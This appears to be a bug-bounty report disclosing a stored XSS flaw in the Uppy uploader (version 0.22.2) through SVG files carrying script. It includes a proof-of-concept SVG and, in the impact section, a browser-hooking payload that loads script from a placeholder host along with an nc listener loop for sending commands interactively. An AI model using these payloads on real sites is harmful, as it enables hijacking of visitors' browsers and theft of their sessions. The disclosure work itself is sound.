[uppy] Stored XSS due to crafted SVG file

> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report! **Module:** [Uppy](https://www.npmjs.com/package/uppy/ "Uppy"). Affected version: 0.22.2 (current build) **Summary:** Uppy is a modular file uploader for node js . Due to insecure handling of SVG image files, an attacker could upload a crafted SVG file and perform a stored XSS with Dom access. SVG can use JavaScript in them and still be treated as images by the website, special care is needed to be taken with SVG files to prevent stored xss. **Description:** We can create a svg file with the following code. ```<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg>``` Then save as svg and upload to our application then click to visit the page. We can create an alert box with access to Dom enabling cooking theft or other forms of attacks such as serving malicious software. ## Steps To Reproduce: I used [the sample code for their dashboard](https://uppy.io/examples/dashboard// "With a Title") to test this proof of concept on my own server. We go to our dashboard and click file from our computer then select our crafted SVG file then click the upload. Then click our SVG file to be taken to where it was uploaded and receive an alert box with the web page's location. ## Impact: An adversary can leverage this vulnerability to enable a persistent java script execution on the web page which can then lead to performing malicious actions without user knowledge. ## Impact An adversary can leverage this vulnerability to hook user's browsers and send java script commands to it interactively thus leading to further compromise of the user or users who visit this webpage . An example of this would being using ```setInterval(function(){with(document)body. appendChild(createElement('script')).src='//HOST:5855'},100)``` Then setting a listener on our host unix host with the following command, ```while :; do printf "j$ "; read c; echo $c | nc -lp 5855 >/dev/null; done``